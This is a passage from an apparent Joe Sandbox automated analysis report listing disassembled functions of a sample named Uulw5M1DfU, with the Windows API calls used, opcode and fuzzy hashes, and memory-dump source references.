                                                                                                • Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorFileLastPointer
                                                                                                • String ID:
                                                                                                • API String ID: 2976181284-0
                                                                                                • Opcode ID: d304dccc413f9fbc2375b0c992bb18d0fa27bc648f40137314f68655dcdcf89d
                                                                                                • Instruction ID: d86f9e507f4e039952bd1031b0dc001be1b0661bb6f0ed5f18f0f7cd7a7605a3
                                                                                                • Opcode Fuzzy Hash: d304dccc413f9fbc2375b0c992bb18d0fa27bc648f40137314f68655dcdcf89d
                                                                                                • Instruction Fuzzy Hash: FCF0B2B8A04208FFCB04CFA8D8448AE7BB9EB49314B2085A9F815A7390D735DA04DF64
                                                                                                APIs
                                                                                                • SysAllocString.OLEAUT32(?), ref: 0040ED05
                                                                                                • _CxxThrowException.MSVCRT(?,00415010), ref: 0040ED28
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd
                                                                                                Similarity
                                                                                                • API ID: AllocExceptionStringThrow
                                                                                                • String ID:
                                                                                                • API String ID: 3773818493-0
                                                                                                • Opcode ID: 34848b6f66320e7823decd545e24a334e79eeaa2350f65fc9219e56b57dd4bad
                                                                                                • Instruction ID: 896a1b371a95ab63a3f889c911e7bff8eb1facf706b7c8fcc1dab20228dace7a
                                                                                                • Opcode Fuzzy Hash: 34848b6f66320e7823decd545e24a334e79eeaa2350f65fc9219e56b57dd4bad
                                                                                                • Instruction Fuzzy Hash: CDE06D71600309ABDB10AF66D8419D67BE8EF00380B00C83FF948CA250E779E590C7D9
                                                                                                APIs
                                                                                                • EnterCriticalSection.KERNEL32(?), ref: 0040E745
                                                                                                • LeaveCriticalSection.KERNEL32(?,?,?,?,?), ref: 0040E764
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$EnterLeave
                                                                                                • String ID:
                                                                                                • API String ID: 3168844106-0
                                                                                                • Opcode ID: 91dbafe27853da7d419d240d9f0ee1b362973845cd939a0bd3a75ec29d074311
                                                                                                • Instruction ID: 086d926b78662e0ab04275255430a857868cdabe8091615e808f779c17768b54
                                                                                                • Opcode Fuzzy Hash: 91dbafe27853da7d419d240d9f0ee1b362973845cd939a0bd3a75ec29d074311
                                                                                                • Instruction Fuzzy Hash: 76F05436200214FBCB119F95DC08E9BBBB9FF49761F14842AF945E7260C771E821DBA4
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd
                                                                                                Similarity
                                                                                                • API ID: H_prolog
                                                                                                • String ID:
                                                                                                • API String ID: 3519838083-0
                                                                                                • Opcode ID: e5321c9a15e7e390b560e3b31c2ad4413e862a9b2ae91dd544a8c0e33ade4a6e
                                                                                                • Instruction ID: 39d544f4fee3d18347c8ea8d59cce7c7d4ef222c74644271f89bd24cd9d44c54
                                                                                                • Opcode Fuzzy Hash: e5321c9a15e7e390b560e3b31c2ad4413e862a9b2ae91dd544a8c0e33ade4a6e
                                                                                                • Instruction Fuzzy Hash: 4B2180316003099BCB14EFA5C945AAE73B5EF40344F14843EF806BB291DB38DD16CB1A
                                                                                                APIs
                                                                                                • SetFileAttributesW.KERNELBASE(?,?), ref: 0040124F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd
                                                                                                Similarity
                                                                                                • API ID: AttributesFile
                                                                                                • String ID:
                                                                                                • API String ID: 3188754299-0
                                                                                                • Opcode ID: 5adc5d60a7dd4af011d60b8927d5fbfdd00464e259639d1fcd3b0c23b8927a9d
                                                                                                • Instruction ID: 5817d5120c2da98d16edaa91ace5ca285f5b3ff1e58b2ffd557e42fef7bfdc6e
                                                                                                • Opcode Fuzzy Hash: 5adc5d60a7dd4af011d60b8927d5fbfdd00464e259639d1fcd3b0c23b8927a9d
                                                                                                • Instruction Fuzzy Hash: 66F05E72100201DBC720AF98C840BA777F5BB84314F04483EE583F2AA0D778B885CB59
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd
                                                                                                Similarity
                                                                                                • API ID: H_prolog
                                                                                                • String ID:
                                                                                                • API String ID: 3519838083-0
                                                                                                • Opcode ID: 05aa82fd4493c2954843b58147a6e12e638aaadf2772ca9641b0bace8f10624d
                                                                                                • Instruction ID: 375caa893e42e0daca7b158ffe4b4b415bc54d3572d418f3e5e61c8e5be1c541
                                                                                                • Opcode Fuzzy Hash: 05aa82fd4493c2954843b58147a6e12e638aaadf2772ca9641b0bace8f10624d
                                                                                                • Instruction Fuzzy Hash: 30F0F272500109BBCF029F85D901AEEBB36EB48354F00811ABA1161160D33A9961AB99
                                                                                                APIs
                                                                                                  • Part of subcall function 0040D985: CloseHandle.KERNELBASE(00000001,000000FF,0040DA61,00413330,?,0040DB39,L@,40000000,00000000,00000000,00000000,0040DB50,00000000,00000001,00000001,00000080), ref: 0040D990
                                                                                                • CreateFileW.KERNELBASE(?,?,?,00000000,?,?,00000000,00413330,?,0040DB39,L@,40000000,00000000,00000000,00000000,0040DB50), ref: 0040DA78
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd
                                                                                                Similarity
                                                                                                • API ID: CloseCreateFileHandle
                                                                                                • String ID:
                                                                                                • API String ID: 3498533004-0
                                                                                                • Opcode ID: 08bceb1980caaee1328d4f84b7def86f7a2986f91a3075995b51455990be9560
                                                                                                • Instruction ID: 040011ad7fb3de3f437c6c7e3ebc1dcda5640d8293b7e84d035d3e38099293ab
                                                                                                • Opcode Fuzzy Hash: 08bceb1980caaee1328d4f84b7def86f7a2986f91a3075995b51455990be9560
                                                                                                • Instruction Fuzzy Hash: A1E04F32140219ABCF215FA49C01BCA7B96AF09760F144526BE11A61E0C672D465AF94
                                                                                                APIs
                                                                                                • WriteFile.KERNELBASE(?,?,00000001,00000000,00000000,?,?,0040DD78,00000001,00000000,00000000,00413330,?,00404D94,?,?), ref: 0040DBBA
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd
                                                                                                Similarity
                                                                                                • API ID: FileWrite
                                                                                                • String ID:
                                                                                                • API String ID: 3934441357-0
                                                                                                • Opcode ID: 3077b537328fed6cd21bdd98b87c61334e39a2b5a14a0e6e22fef2783c677b0b
                                                                                                • Instruction ID: ec3d056ad33d5175d1bee219b94afd5900c8108b90431a53c6143dcb1d381838
                                                                                                • Opcode Fuzzy Hash: 3077b537328fed6cd21bdd98b87c61334e39a2b5a14a0e6e22fef2783c677b0b
                                                                                                • Instruction Fuzzy Hash: D7E0C275600208FBCB00CF95C801B9E7BBABB49755F10C069F918AA2A0D739AA10DF54
                                                                                                APIs
                                                                                                • _beginthreadex.MSVCRT ref: 00406552
                                                                                                  • Part of subcall function 00406501: GetLastError.KERNEL32(00406563,00000000), ref: 004064F5
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorLast_beginthreadex
                                                                                                • String ID:
                                                                                                • API String ID: 4034172046-0
                                                                                                • Opcode ID: e5ca857e6cae9760b500a95e192be9ea992c298de85bf840c792a1269a380ec9
                                                                                                • Instruction ID: fe95790bd269afcad05a26a3721163fc0b830ac61c9b3c5b6bbddf8a66cf2d64
                                                                                                • Opcode Fuzzy Hash: e5ca857e6cae9760b500a95e192be9ea992c298de85bf840c792a1269a380ec9
                                                                                                • Instruction Fuzzy Hash: 12D05EF6400208BFDF01DFE0DC05CAB3BADEB08204B004464FD05C2150E632DA108B60
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd
                                                                                                Similarity
                                                                                                • API ID: H_prolog
                                                                                                • String ID:
                                                                                                • API String ID: 3519838083-0
                                                                                                • Opcode ID: e8864bf39b3a1c941500cd6d38dedcba990c3b7db4eb5411aa9ab2a8414fad35
                                                                                                • Instruction ID: 312fbe8762c42e8d4a239ae194adb86e93363bc1e5443e54fb58aca6058f63a2
                                                                                                • Opcode Fuzzy Hash: e8864bf39b3a1c941500cd6d38dedcba990c3b7db4eb5411aa9ab2a8414fad35
                                                                                                • Instruction Fuzzy Hash: 70D05EB2A04108FBE7109F85D946BEEFB78EB80399F10823FB506B1150D7BC5A0196AD
                                                                                                APIs
                                                                                                • ReadFile.KERNELBASE(?,?,?,00000000,00000000), ref: 0040DAF2
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd
                                                                                                Similarity
                                                                                                • API ID: FileRead
                                                                                                • String ID:
                                                                                                • API String ID: 2738559852-0
                                                                                                • Opcode ID: 05e1a1911e5ec75f7d6758f34865a5827037a9c860dec67033daab0b9cfe5943
                                                                                                • Instruction ID: c05821c64f4412cbb188b0f884d423eaa3d686fb1c941f6ac6705c8b1bb703da
                                                                                                • Opcode Fuzzy Hash: 05e1a1911e5ec75f7d6758f34865a5827037a9c860dec67033daab0b9cfe5943
                                                                                                • Instruction Fuzzy Hash: 58E0EC75211208FFDB01CF90CD01FDE7BBDFB49755F208058E90596160C7759A10EB54
                                                                                                APIs
                                                                                                • SetFileTime.KERNELBASE(?,?,?,?,0040DB94,00000000,00000000,?,0040123C,?), ref: 0040DB78
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd
                                                                                                Similarity
                                                                                                • API ID: FileTime
                                                                                                • String ID:
                                                                                                • API String ID: 1425588814-0
                                                                                                • Opcode ID: d3a1cd3220883f1d47adb6259c26a1719b9664e7d8bae69288c7dd66fbb4bdaa
                                                                                                • Instruction ID: c6000770aa4fb4c72b4925fc402daec6625791e8065b7518697746b49206ca3e
                                                                                                • Opcode Fuzzy Hash: d3a1cd3220883f1d47adb6259c26a1719b9664e7d8bae69288c7dd66fbb4bdaa
                                                                                                • Instruction Fuzzy Hash: 40C04C3A199105FF8F020F70CD04C1ABBA2AB95722F10C918B199C4070CB328424EB02
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd
                                                                                                Similarity
                                                                                                • API ID: memmove
                                                                                                • String ID:
                                                                                                • API String ID: 2162964266-0
                                                                                                • Opcode ID: 97bd8de7a7fe9ad43a3345e9333d2138b4beb196f0434672ce39f7d09e0e15cd
                                                                                                • Instruction ID: f56dbf57367ec124b55c1fed62106b1dafce564086f6503587e0b0fbfa293862
                                                                                                • Opcode Fuzzy Hash: 97bd8de7a7fe9ad43a3345e9333d2138b4beb196f0434672ce39f7d09e0e15cd
                                                                                                • Instruction Fuzzy Hash: EA21A271A00B009FC724CFAAC88485BF7F9FF88724764896EE49A93A40E774B945CB54
                                                                                                APIs
                                                                                                • _CxxThrowException.MSVCRT(?,00414F84), ref: 0040E616
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExceptionThrow
                                                                                                • String ID:
                                                                                                • API String ID: 432778473-0
                                                                                                • Opcode ID: 85c4e5dde0f8cee934fbe77132b2d5831568e55a053817787dcfc8e06ea2b7f6
                                                                                                • Instruction ID: f2b552c6dcb6979234feea5fe890f572eb9d388e9264680fa6f26452196acfb0
                                                                                                • Opcode Fuzzy Hash: 85c4e5dde0f8cee934fbe77132b2d5831568e55a053817787dcfc8e06ea2b7f6
                                                                                                • Instruction Fuzzy Hash: 20017171600701AFDB28CFBAD805997BBF8EF85314704496EE482D3651E374F946CB50
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd
                                                                                                Similarity
                                                                                                • API ID: free
                                                                                                • String ID:
                                                                                                • API String ID: 1294909896-0
                                                                                                • Opcode ID: ad693850b0beb581ae9f70f91648a78de6b85f526a16152dd36665cc48ec9015
                                                                                                • Instruction ID: 8ccd5c106adaedd21fdabd868c2a091acccb285e2c6396e7c66228af9079aab7
                                                                                                • Opcode Fuzzy Hash: ad693850b0beb581ae9f70f91648a78de6b85f526a16152dd36665cc48ec9015
                                                                                                • Instruction Fuzzy Hash: 68E0ED311087008BEB74DA38A941F97B3DAAB14314F15893FE89AE7690EB74FC448A59
                                                                                                APIs
                                                                                                • ??2@YAPAXI@Z.MSVCRT(00000018,00000000,004044E9,?,?,?,?,?,?,?,?,?,?,00000000,00000020,?), ref: 00402F71
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd
                                                                                                Similarity
                                                                                                • API ID: ??2@
                                                                                                • String ID:
                                                                                                • API String ID: 1033339047-0
                                                                                                • Opcode ID: 76c2607c9262a084594b8968e60506e1095ba5b3921c342d3f15f01c827a8030
                                                                                                • Instruction ID: 194059228ff5733793a196764ebf5a0b63d959e09992ce12dff2d54d27d13516
                                                                                                • Opcode Fuzzy Hash: 76c2607c9262a084594b8968e60506e1095ba5b3921c342d3f15f01c827a8030
                                                                                                • Instruction Fuzzy Hash: 67D0A9313083121ADA5432320A09AAF84848B503A0F10083FB800A32D1DCBE8C81A299
                                                                                                APIs
                                                                                                • CloseHandle.KERNELBASE(00000001,000000FF,0040DA61,00413330,?,0040DB39,L@,40000000,00000000,00000000,00000000,0040DB50,00000000,00000001,00000001,00000080), ref: 0040D990
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd
                                                                                                Similarity
                                                                                                • API ID: CloseHandle
                                                                                                • String ID:
                                                                                                • API String ID: 2962429428-0
                                                                                                • Opcode ID: 5a1e794e604a6db35733be3680912b24c50de2529967425d082228c541f5af6f
                                                                                                • Instruction ID: 71cfb53d0268b44c797f7400575dcc0518408263689e7c465582b3111ebcfb94
                                                                                                • Opcode Fuzzy Hash: 5a1e794e604a6db35733be3680912b24c50de2529967425d082228c541f5af6f
                                                                                                • Instruction Fuzzy Hash: 95D0127251422156CF646E7CB8849C277D85A06334335176AF0B4E32E4D3749DCB5698
                                                                                                APIs
                                                                                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,0040E4D6,00020000,00000000,?,00000000,?,0040D92B,?,?,00000000,?,0040D96E), ref: 004024E0
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1747316090.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1747300899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747333058.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747346525.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1747359386.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_Uulw5M1DfU.jbxd
                                                                                                Similarity
                                                                                                • API ID: AllocVirtual
                                                                                                • String ID:
                                                                                                • API String ID: 4275171209-0
                                                                                                • Opcode ID: 076169c5b403ddfe74b0b9752022086d8412a0b80d08fe31e2627fee67d73aef
                                                                                                • Instruction ID: 23ad038ad5ccaf642d49e1102795c1c714580f299e31bec6e074b0e2bc220d86
